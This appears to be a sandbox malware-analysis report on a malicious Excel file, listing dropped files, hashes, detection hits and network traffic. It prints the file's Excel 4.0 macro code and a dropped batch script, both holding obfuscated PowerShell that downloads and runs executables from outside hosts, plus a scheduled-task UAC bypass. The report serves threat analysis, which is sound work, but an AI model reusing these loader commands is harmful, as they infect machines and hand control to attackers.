                                                          SSDEEP:96:chQCsMqZqvsqvJCwo1z8hQCsMqZqvsEHyqvJCwor/zkKYyHyf8R8lUVbIu:cywo1z8yMHnor/zkRf8RDIu
                                                          MD5:88AF443197F04FC07F6BE051B7084403
                                                          SHA1:AFAD4C89B8CA751992F0C636B23DD4EA2E08D3B9
                                                          SHA-256:24E7ED8A16E78FD8367F86C9DA45FD5456CC2313DB87C7585526D47C3552E3E8
                                                          SHA-512:D7E76297B4ED2A53C288D3AF7928C9EF03FFC2ABCD868DFF34CB69622E4F3EA0491B327027FEE7C4B9C6FB92A34560A2AE86154B69E12DE9149E0576FE1E1F2A
                                                          Malicious:false
                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\R38BWSSJ7G62VJURDECV.temp
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.5877382331325665
                                                          Encrypted:false
                                                          SSDEEP:96:chQCsMqZqvsqvJCwo1z8hQCsMqZqvsEHyqvJCwor/zkKYyHyf8R8lUVbIu:cywo1z8yMHnor/zkRf8RDIu
                                                          MD5:88AF443197F04FC07F6BE051B7084403
                                                          SHA1:AFAD4C89B8CA751992F0C636B23DD4EA2E08D3B9
                                                          SHA-256:24E7ED8A16E78FD8367F86C9DA45FD5456CC2313DB87C7585526D47C3552E3E8
                                                          SHA-512:D7E76297B4ED2A53C288D3AF7928C9EF03FFC2ABCD868DFF34CB69622E4F3EA0491B327027FEE7C4B9C6FB92A34560A2AE86154B69E12DE9149E0576FE1E1F2A
                                                          Malicious:false
                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RIK1BAD7SBY1C0IHKYVN.temp
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.5877382331325665
                                                          Encrypted:false
                                                          SSDEEP:96:chQCsMqZqvsqvJCwo1z8hQCsMqZqvsEHyqvJCwor/zkKYyHyf8R8lUVbIu:cywo1z8yMHnor/zkRf8RDIu
                                                          MD5:88AF443197F04FC07F6BE051B7084403
                                                          SHA1:AFAD4C89B8CA751992F0C636B23DD4EA2E08D3B9
                                                          SHA-256:24E7ED8A16E78FD8367F86C9DA45FD5456CC2313DB87C7585526D47C3552E3E8
                                                          SHA-512:D7E76297B4ED2A53C288D3AF7928C9EF03FFC2ABCD868DFF34CB69622E4F3EA0491B327027FEE7C4B9C6FB92A34560A2AE86154B69E12DE9149E0576FE1E1F2A
                                                          Malicious:false
                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                          C:\Users\user\AppData\Roaming\axoikBEWgDCn.exe
                                                          Process:C:\Users\user\AppData\Roaming\sb.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3485696
                                                          Entropy (8bit):7.9448188580379755
                                                          Encrypted:false
                                                          SSDEEP:98304:w1oluFwZls+JDRmvEYCrSEebiRi0LrU3By8HnYeCP:w1ocFwZls+JD4vlC6L8r2By8HYe
                                                          MD5:1C1BDD57483BBFBB497B4596BE12B053
                                                          SHA1:C7DB6BBAEC3DD6C44EA291185A186489B74D7EF7
                                                          SHA-256:22DBE6172D32B9B90D66036688E440A9026524F8C4C61B1C05F45DBD63919483
                                                          SHA-512:4A6AB3501A484BF4F73A2E237B80A7BA812F7CD2AA84E8BFB92E075A441AB3A4663039C64F563A84663C6EEEBCFAAD7AE7E0158893106B827088C283E046A627
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_..............0...5..........85.. ...@5...@.. ........................5...........@.................................`85.O....@5......................`5...................................................... ............... ..H............text.....5.. ....5................. ..`.rsrc........@5.......5.............@..@.reloc.......`5.......5.............@..B.................85.....H....... ]...C......e........4.........................................^..}.....(.......(.....*..*..0..+.........,..{.......+....,...{....o........(.....*..0................(....s......s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....{....o......{....o .....(......{.....o!.....{....o"...."...Bs#...o$...&.{....o"...."...Bs#...o$...&.{....o%....{......o&.....{....o%....{......o&.....{....o%....{......o&.....{....o%....{......o&.....{....o
                                                          C:\Users\user\AppData\Roaming\sb.exe
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3485696
                                                          Entropy (8bit):7.9448188580379755
                                                          Encrypted:false
                                                          SSDEEP:98304:w1oluFwZls+JDRmvEYCrSEebiRi0LrU3By8HnYeCP:w1ocFwZls+JD4vlC6L8r2By8HYe
                                                          MD5:1C1BDD57483BBFBB497B4596BE12B053
                                                          SHA1:C7DB6BBAEC3DD6C44EA291185A186489B74D7EF7
                                                          SHA-256:22DBE6172D32B9B90D66036688E440A9026524F8C4C61B1C05F45DBD63919483
                                                          SHA-512:4A6AB3501A484BF4F73A2E237B80A7BA812F7CD2AA84E8BFB92E075A441AB3A4663039C64F563A84663C6EEEBCFAAD7AE7E0158893106B827088C283E046A627
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_..............0...5..........85.. ...@5...@.. ........................5...........@.................................`85.O....@5......................`5...................................................... ............... ..H............text.....5.. ....5................. ..`.rsrc........@5.......5.............@..@.reloc.......`5.......5.............@..B.................85.....H....... ]...C......e........4.........................................^..}.....(.......(.....*..*..0..+.........,..{.......+....,...{....o........(.....*..0................(....s......s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....{....o......{....o .....(......{.....o!.....{....o"...."...Bs#...o$...&.{....o"...."...Bs#...o$...&.{....o%....{......o&.....{....o%....{......o&.....{....o%....{......o&.....{....o%....{......o&.....{....o
                                                          C:\Users\user\Desktop\66EE0000
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:Applesoft BASIC program data, first line number 16
                                                          Category:dropped
                                                          Size (bytes):266808
                                                          Entropy (8bit):7.549980080268811
                                                          Encrypted:false
                                                          SSDEEP:6144:nk3hbdlylKsgqopeJBWhZFVE+W2NdAIv9DQokMufSR1f8f3BsgaINVQTB9GccQa8:IFDQxtfSHfmBgWOT3VaZK
                                                          MD5:AFEF418E4C39AF2C5FFF34A15166CF88
                                                          SHA1:C9CA7EF1C1CA8FF2CB3FCECF3583020554AD6E9E
                                                          SHA-256:02403C4922BE12C6D388F91D7D3E7F74245705E57652285D22D143162436A0D3
                                                          SHA-512:374FE32BB097C309262FEC154EA71DCF5A1FC6661056FB4BF72DDFBDE5C2319BC62E2390EB48C60CC7665B7C24DD9274413878349BBA47D009F15FB2DB513B6D
                                                          Malicious:false
                                                          Preview: ........g2..........................\.p....user B.....a.........=..............ThisWorkbook....................................=........K^)8.......X.@...........".......................1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1. .................C.o.n.s.o.l.a.s.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6..
                                                          C:\Users\user\Documents\pd.bat
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with very long lines, with CRLF line terminators
                                                          Category:modified
                                                          Size (bytes):2390
                                                          Entropy (8bit):5.443448049989016
                                                          Encrypted:false
                                                          SSDEEP:48:dnjA3U3jRVDIdC/7vUU3jRVDIdC/7vQU3jRVDIdC/7vaVDIdPN:dnM3U3b/QU3b/kU3b/J
                                                          MD5:67C6913705E0A631FF9A2F6F4A9BF544
                                                          SHA1:3BBE7C75091184A531A66FE34BE658FE5A4CB238
                                                          SHA-256:43B269B66277C13801C8E20D5D3ED41B28F037F6EFBEFB5DBEBCF26B67BB96EA
                                                          SHA-512:A24C4EC00666392DDAF3A980EDE55C0D8C58A205010BA63DDB7AA5E636B8C696B53416F4649A443030C1B960E007F61582F162AA9BC12EE7C16E2CBD9360EE05
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: C:\Users\user\Documents\pd.bat, Author: Florian Roth
                                                          • Rule: JoeSecurity_ObfuscatedPowershell, Description: Yara detected Obfuscated Powershell, Source: C:\Users\user\Documents\pd.bat, Author: Joe Security
                                                          Preview: mode 18,1..color FE..setlocal..for /f "tokens=4-5 delims=. " %%i in ('ver') do set VERSION=%%i.%%j..if "%version%" == "10.0" ( echo "Windows 10 detected" ..reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht' + 'tps://rebrand.ly/FBobfu'),($env:appdata)+'\ok.bat');Start-Sleep 2; Start-Process $env:appdata\ok.bat; Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;&REM " >nul..timeout /t 2 >nul..schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul..timeout /t 3 >nul..reg delete "HKCU\Environment" /v "windir" /F..)..if "%version%" == "6.3" ( echo "Windows 8.1 detected" ..reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht' + 'tps://rebrand.ly/FBobfu'),($env:appd

                                                          Static File Info

                                                          General

                                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Last Saved By: blobijump, Create Time/Date: Sun Sep 20 22:17:44 2020, Last Saved Time/Date: Sun Jan 3 23:14:32 2021, Security: 1
                                                          Entropy (8bit):7.743334515470374
                                                          TrID:
                                                          • Microsoft Excel sheet (30009/1) 47.99%
                                                          • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                          • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                          File name:spetsifikatsiya.xls
                                                          File size:234496
                                                          MD5:bf9774e5063791aba95abb5b808aea43
                                                          SHA1:2774db354121fd9080d86623e8e854af967b14cf
                                                          SHA256:bcac1e33956458b61bbc185ad3861e385f863ec9bb9232e67eea95282929ce30
                                                          SHA512:52325d089df867775b5498bf4aeb032a5199fc22f4532b44ddef14c6dbb9019ee44284b8e63e89fad42ea24a4177805a644b41aa825e2c90711c7da7f6d4113b
                                                          SSDEEP:6144:cnSGiysRchNXHfA1MiWhZFVEld+Dr7rIHtjQA7MOfSRFvkf3ysQaoNVwTpNGc8ik:BNjQaNfS3veyQ2eTXrS7
                                                          File Content Preview:........................;......................................................................................................................................................................................................................................

                                                          File Icon

                                                          Icon Hash:e4eea286a4b4bcb4

                                                          Static OLE Info

                                                          General

                                                          Document Type:OLE
                                                          Number of OLE Files:1

                                                          OLE File "spetsifikatsiya.xls"

                                                          Indicators

                                                          Has Summary Info:True
                                                          Application Name:unknown
                                                          Encrypted Document:False
                                                          Contains Word Document Stream:False
                                                          Contains Workbook/Book Stream:True
                                                          Contains PowerPoint Document Stream:False
                                                          Contains Visio Document Stream:False
                                                          Contains ObjectPool Stream:
                                                          Flash Objects Count:
                                                          Contains VBA Macros:True

                                                          Summary

                                                          Code Page:1252
                                                          Last Saved By:blobijump
                                                          Create Time:2020-09-20 21:17:44
                                                          Last Saved Time:2021-01-03 23:14:32
                                                          Security:1

                                                          Document Summary

                                                          Document Code Page:1252
                                                          Thumbnail Scaling Desired:False
                                                          Contains Dirty Links:False
                                                          Shared Document:False
                                                          Changed Hyperlinks:False
                                                          Application Version:1048576

                                                          Streams

                                                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 276
                                                          General
                                                          Stream Path:\x5DocumentSummaryInformation
                                                          File Type:data
                                                          Stream Size:276
                                                          Entropy:3.16930549839
                                                          Base64 Encoded:False
                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . . . F e u i l l e s d e c a l c u l . . . . . . . . . . . . . . . . . M a c r o
                                                          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 98 00 00 00 02 00 00 00 e4 04 00 00
                                                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 156
                                                          General
                                                          Stream Path:\x5SummaryInformation
                                                          File Type:data
                                                          Stream Size:156
                                                          Entropy:3.29938329109
                                                          Base64 Encoded:False
                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . L . . . . . . . X . . . . . . . d . . . . . . . . . . . . . . . . . . . b l o b i j u m p . . . @ . . . . L . z . . . . @ . . . . . n 1 & . . . . . . . . . . .
                                                          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 08 00 00 00 38 00 00 00 0c 00 00 00 4c 00 00 00 0d 00 00 00 58 00 00 00 13 00 00 00 64 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 0a 00 00 00 62 6c 6f 62 69 6a 75 6d 70 00 00 00 40 00 00 00
                                                          Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 230144
                                                          General
                                                          Stream Path:Workbook
                                                          File Type:Applesoft BASIC program data, first line number 16
                                                          Stream Size:230144
                                                          Entropy:7.77909423419
                                                          Base64 Encoded:True
                                                          Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . b l o b i j u m p B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p ^ ) 8 . . . . . . . X . @ . .
                                                          Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 09 00 00 62 6c 6f 62 69 6a 75 6d 70 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                          Macro 4.0 Code

                                                          ;;;;;;;112;;;;;;"=GET.CELL(5;L581)";;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item """"pd""&CHAR(46)&""bat"""" -Destination """"$e`nV:T`EMP"""""")";;;;;;;;;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd""&CHAR(46)&""bat -Force"")";;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd""&CHAR(46)&""bat"")";;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 7;cd """"$e`nV:T`EMP; ./pd""&CHAR(46)&""bat"""""")";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 (nEw-oB`jecT Ne""&CHAR(116)&CHAR(46)&CHAR(87)&CHAR(101)&""bcLIENt).('Down'+'loadFile').In""&CHAR(118)&""oke('""&CHAR(104)&""ttps://cutt.ly/4jsSu5Q','pd""&CHAR(46)&""bat')"")";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 5, 2021 10:06:37.203154087 CET49167443192.168.2.22104.22.0.232
                                                          Jan 5, 2021 10:06:37.243231058 CET44349167104.22.0.232192.168.2.22
                                                          Jan 5, 2021 10:06:37.243443012 CET49167443192.168.2.22104.22.0.232
                                                          Jan 5, 2021 10:06:37.256114006 CET49167443192.168.2.22104.22.0.232
                                                          Jan 5, 2021 10:06:37.296238899 CET44349167104.22.0.232192.168.2.22
                                                          Jan 5, 2021 10:06:37.300632000 CET44349167104.22.0.232192.168.2.22
                                                          Jan 5, 2021 10:06:37.300725937 CET44349167104.22.0.232192.168.2.22
                                                          Jan 5, 2021 10:06:37.300777912 CET44349167104.22.0.232192.168.2.22
                                                          Jan 5, 2021 10:06:37.300798893 CET49167443192.168.2.22104.22.0.232
                                                          Jan 5, 2021 10:06:37.317473888 CET49167443192.168.2.22104.22.0.232
                                                          Jan 5, 2021 10:06:37.357554913 CET44349167104.22.0.232192.168.2.22
                                                          Jan 5, 2021 10:06:37.357705116 CET44349167104.22.0.232192.168.2.22
                                                          Jan 5, 2021 10:06:37.565538883 CET49167443192.168.2.22104.22.0.232
                                                          Jan 5, 2021 10:06:37.604422092 CET44349167104.22.0.232192.168.2.22
                                                          Jan 5, 2021 10:06:37.604573011 CET49167443192.168.2.22104.22.0.232
                                                          Jan 5, 2021 10:06:38.881004095 CET49167443192.168.2.22104.22.0.232
                                                          Jan 5, 2021 10:06:38.921164989 CET44349167104.22.0.232192.168.2.22
                                                          Jan 5, 2021 10:06:39.036650896 CET44349167104.22.0.232192.168.2.22
                                                          Jan 5, 2021 10:06:39.036705971 CET44349167104.22.0.232192.168.2.22
                                                          Jan 5, 2021 10:06:39.036986113 CET49167443192.168.2.22104.22.0.232
                                                          Jan 5, 2021 10:06:39.040473938 CET4916980192.168.2.2237.46.150.139
                                                          Jan 5, 2021 10:06:39.087682962 CET804916937.46.150.139192.168.2.22
                                                          Jan 5, 2021 10:06:39.087904930 CET4916980192.168.2.2237.46.150.139
                                                          Jan 5, 2021 10:06:39.088344097 CET4916980192.168.2.2237.46.150.139
                                                          Jan 5, 2021 10:06:39.137165070 CET804916937.46.150.139192.168.2.22
                                                          Jan 5, 2021 10:06:39.137238026 CET804916937.46.150.139192.168.2.22
                                                          Jan 5, 2021 10:06:39.137267113 CET804916937.46.150.139192.168.2.22
                                                          Jan 5, 2021 10:06:39.139713049 CET4916980192.168.2.2237.46.150.139
                                                          Jan 5, 2021 10:06:39.344322920 CET4916980192.168.2.2237.46.150.139
                                                          Jan 5, 2021 10:06:39.470077991 CET49167443192.168.2.22104.22.0.232
                                                          Jan 5, 2021 10:06:39.470149040 CET4916980192.168.2.2237.46.150.139
                                                          Jan 5, 2021 10:06:47.839543104 CET4917080192.168.2.2279.124.76.20
                                                          Jan 5, 2021 10:06:47.915848970 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:47.915924072 CET4917080192.168.2.2279.124.76.20
                                                          Jan 5, 2021 10:06:47.916533947 CET4917080192.168.2.2279.124.76.20
                                                          Jan 5, 2021 10:06:47.992923021 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:47.998641968 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:47.998667955 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:47.998748064 CET4917080192.168.2.2279.124.76.20
                                                          Jan 5, 2021 10:06:47.998933077 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:47.998955965 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:47.999006987 CET4917080192.168.2.2279.124.76.20
                                                          Jan 5, 2021 10:06:47.999157906 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:47.999178886 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:47.999238968 CET4917080192.168.2.2279.124.76.20
                                                          Jan 5, 2021 10:06:47.999249935 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:47.999360085 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:47.999393940 CET4917080192.168.2.2279.124.76.20
                                                          Jan 5, 2021 10:06:47.999598980 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:47.999624968 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.000940084 CET4917080192.168.2.2279.124.76.20
                                                          Jan 5, 2021 10:06:48.075020075 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.075107098 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.075124979 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.075159073 CET4917080192.168.2.2279.124.76.20
                                                          Jan 5, 2021 10:06:48.075324059 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.075378895 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.075423956 CET4917080192.168.2.2279.124.76.20
                                                          Jan 5, 2021 10:06:48.075555086 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.075572014 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.075609922 CET4917080192.168.2.2279.124.76.20
                                                          Jan 5, 2021 10:06:48.075809002 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.075824976 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.075896978 CET4917080192.168.2.2279.124.76.20
                                                          Jan 5, 2021 10:06:48.076006889 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.076028109 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.076080084 CET4917080192.168.2.2279.124.76.20
                                                          Jan 5, 2021 10:06:48.076229095 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.076255083 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.076478958 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.076489925 CET4917080192.168.2.2279.124.76.20
                                                          Jan 5, 2021 10:06:48.076503992 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.076545000 CET4917080192.168.2.2279.124.76.20
                                                          Jan 5, 2021 10:06:48.076729059 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.077181101 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.077228069 CET4917080192.168.2.2279.124.76.20
                                                          Jan 5, 2021 10:06:48.077464104 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.077483892 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.077528954 CET4917080192.168.2.2279.124.76.20
                                                          Jan 5, 2021 10:06:48.077542067 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.151778936 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.151801109 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.151897907 CET4917080192.168.2.2279.124.76.20
                                                          Jan 5, 2021 10:06:48.151946068 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.151993990 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.152067900 CET4917080192.168.2.2279.124.76.20
                                                          Jan 5, 2021 10:06:48.152112007 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.152199984 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.152261019 CET4917080192.168.2.2279.124.76.20
                                                          Jan 5, 2021 10:06:48.152353048 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.152405024 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.152507067 CET4917080192.168.2.2279.124.76.20
                                                          Jan 5, 2021 10:06:48.152542114 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.152559042 CET804917079.124.76.20192.168.2.22
